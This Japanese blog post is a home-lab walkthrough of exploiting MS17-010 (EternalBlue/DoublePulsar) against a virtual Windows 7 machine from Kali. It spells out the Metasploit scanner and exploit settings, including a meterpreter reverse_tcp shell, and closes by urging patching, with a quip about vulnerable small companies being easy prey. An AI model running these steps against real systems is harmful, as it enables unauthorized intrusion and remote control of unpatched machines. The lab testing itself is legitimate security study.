とある親父の侵入実験【MS17-010の活用】

f:id:appleseedj073:20170503114540p:plain

今更なんだけど最近話題のWannaCryptが利用していることでお馴染みの脆弱性「MS17-010」を利用した攻撃というものを検証してみたいと思う。

itpro.nikkeibp.co.jp

脆弱性に関する細かいことは以下のリンクを参照してください。

マイクロソフト セキュリティ情報 MS17-010 - 緊急

 

今回は、この動画を参考にしています。


Ms17 010 eternalblue

 

準備したもの

 

環境(仮想環境)

  1. Kali Linux(192.168.1.100)
  2. Windows 7 (192.168.1.150)

 

1 環境構築

この動画によると、まず、wineをインストールする。

f:id:appleseedj073:20170514223432p:plain

 root@kl-01rbt:~# apt-get update

 root@kl-01rbt:~# apt-get install wine32

我が家の環境では、既にインストールされていた様子

 

次に脆弱性を利用する攻撃モジュールをゲットしてくる。

github.com

f:id:appleseedj073:20170514223719p:plain

 root@kl-01rbt:~# git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git

 

落としてきたやつの「deps」と「eternalblue_doublepulsar.rb」を/usr/share/metasploit-framework/modules/exploits/windows/smbにコピーする。この作業は動画のようにGUIでやったほうが簡単かも

f:id:appleseedj073:20170514224035p:plain

 

2 調査

次に対象となるWindows 7がSMBv1を使っているのかを調査する。

調査用のモジュールは最近のアップデートで組み込まれている様子。

f:id:appleseedj073:20170515003126p:plain

 msf > search ms17-010

これでDBを探すと「auxiliary/scanner/smb/smb_ms17_010」という名前の「MS17-010 SMB RCE Detection」をしてくれるモジュールが見つかるので実行

 msf > use auxiliary/scanner/smb/smb_ms17_010
 msf auxiliary(smb_ms17_010) > set RHOSTS 192.168.1.150
 RHOSTS => 192.168.1.150
 msf auxiliary(smb_ms17_010) > run

調査の結果としては、MS17-010の脆弱性があって何か出来そうな雰囲気を醸し出してくれるw

 

3 攻撃準備 

モジュールを配置したらmetasploitの起動

 root@kl-01rbt:~# msfconsole

起動したら

f:id:appleseedj073:20170514225856p:plain

 msf > search eternalblue

 さっき入れたモジュールが見つかったらいつものように設定していく。今回はやたら設定項目長い・・・。

 

f:id:appleseedj073:20170514231514p:plain

f:id:appleseedj073:20170514231712p:plain

 msf > use exploit/windows/smb/eternalblue_doublepulsar
 msf exploit(eternalblue_doublepulsar) > set payload windows/meterpreter/reverse_tcp
 payload => windows/meterpreter/reverse_tcp
 msf exploit(eternalblue_doublepulsar) > set DOUBLEPULSARPATH  /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
 DOUBLEPULSARPATH => /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
 msf exploit(eternalblue_doublepulsar) > set ETERNALBLUEPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
 ETERNALBLUEPATH => /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
 msf exploit(eternalblue_doublepulsar) > set target 9
 target => 9
 msf exploit(eternalblue_doublepulsar) > set RHOST 192.168.1.150
 RHOST => 192.168.1.150
 msf exploit(eternalblue_doublepulsar) > set WINEPATH /root/
 WINEPATH => WINEPATH /root/
 msf exploit(eternalblue_doublepulsar) > set TARGETARCHITECTURE x86
 TARGETARCHITECTURE => x86
 msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT explorer.exe
 PROCESSINJECT => explorer.exe
 msf exploit(eternalblue_doublepulsar) > set LHOST 192.168.1.100
 LHOST => 192.168.1.100

 

4 攻撃 

これを実行してやると・・・

f:id:appleseedj073:20170514235132p:plain

f:id:appleseedj073:20170515000104p:plain

見事に侵入成功w

 

 

5 結論

この脆弱性自体、3月のアップデートで修正されているんだけど、今回のランサムウェア騒ぎでは適応していなかった(若しくは何かしらの理由で適応できない)環境の端末が感染して大変なことになった。やはり、パッチは公開されたら適用するべきだと思うし、もし何かしらの理由で適用ができないならばしっかりと代替手段を講じるべきだと思う。

ま、ペネトレ仕掛ける側とすると、こんなメジャー級の脆弱性が残ってる中小企業さんとか見つけちゃうと可哀想(ご馳走)に思えちゃうんだけどねw